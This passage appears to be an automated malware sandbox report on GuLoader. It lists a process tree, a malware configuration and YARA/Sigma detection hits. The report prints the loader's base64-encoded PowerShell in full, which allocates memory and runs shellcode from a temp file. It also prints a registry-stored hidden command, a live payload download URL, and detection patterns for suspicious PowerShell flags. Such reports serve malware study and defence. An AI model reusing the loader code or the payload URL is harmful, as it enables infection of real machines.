GsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

ieinstal.exe (PID: 3424 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

powershell.exe (PID: 2072 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

ieinstal.exe (PID: 1580 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

powershell.exe (PID: 5176 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000007.00000000.15018322075.0000000000B80000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000013.00000000.15958445085.0000000002D20000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.16334182427.0000000003000000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: powershell.exe PID: 2072	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xb1dfc:$sa2: -encodedcommand 0xe9c84:$sa2: -encodedcommand 0xfe45c:$sa2: -encodedCommand 0xfe488:$sa2: -encodedCommand 0xfe4b8:$sa2: -encodedCommand 0xff234:$sa2: -EncodedCommand 0xffd55:$sa2: -EncodedCommand 0xffdf0:$sa2: -encodedCommand 0x116969:$sa2: -encodedcommand 0x118a06:$sa2: -encodedcommand 0x11a6b7:$sa2: -encodedcommand 0x16ca73:$sa2: -encodedcommand 0xe64e:$sb3: -windowstyle hidden 0xe6bc:$sb3: -windowstyle hidden 0x5df25:$sb3: -windowstyle hidden 0x5df93:$sb3: -windowstyle hidden 0x63d2f:$sb3: -windowstyle hidden 0x63d98:$sb3: -windowstyle hidden 0x63e06:$sb3: -windowstyle hidden 0x6414b:$sb3: -windowstyle hidden 0x64396:$sb3: -windowstyle hidden
Process Memory Space: powershell.exe PID: 2692	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x100bb:$sa2: -encodedcommand 0x120e6:$sa2: -encodedcommand 0x15755:$sa2: -encodedcommand 0x1a17e:$sa2: -encodedcommand 0x1bee0:$sa2: -encodedcommand 0x1db7b:$sa2: -encodedcommand 0x20559:$sa2: -encodedcommand 0x23fcb:$sa2: -encodedcommand 0x25fb0:$sa2: -encodedcommand 0x28f2d:$sa2: -encodedcommand 0x4bb06:$sa2: -encodedcommand 0x4e337:$sa2: -encodedcommand 0x4ffd2:$sa2: -encodedcommand 0x51f8a:$sa2: -encodedcommand 0x79532:$sa2: -encodedcommand 0x7b28e:$sa2: -encodedcommand 0x7cf29:$sa2: -encodedcommand 0x7ee36:$sa2: -encodedcommand 0x91aae:$sa2: -encodedcommand 0x9ba38:$sa2: -encodedcommand 0x9e75d:$sa2: -encodedcommand
Process Memory Space: powershell.exe PID: 7972	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x132:$sa2: -encodedcommand 0x4f8a:$sa2: -encodedcommand 0x2932b:$sa2: -encodedcommand 0x2b32c:$sa2: -encodedcommand 0x438f2:$sa2: -encodedcommand 0x4ae95:$sa2: -encodedcommand 0x4ce76:$sa2: -encodedcommand 0x5569d:$sa2: -encodedcommand 0x57648:$sa2: -encodedcommand 0x62066:$sa2: -encodedcommand 0x65a69:$sa2: -encodedcommand 0x6844a:$sa2: -encodedcommand 0x816d5:$sa2: -encodedcommand 0x850d0:$sa2: -encodedcommand 0x86fea:$sa2: -encodedcommand 0x958ef:$sa2: -encodedcommand 0x97815:$sa2: -encodedcommand 0x9cf73:$sa2: -encodedcommand 0x9f3dc:$sa2: -encodedcommand 0xa1079:$sa2: -encodedcommand 0xa4511:$sa2: -encodedcommand
Click to see the 6 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAE

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEA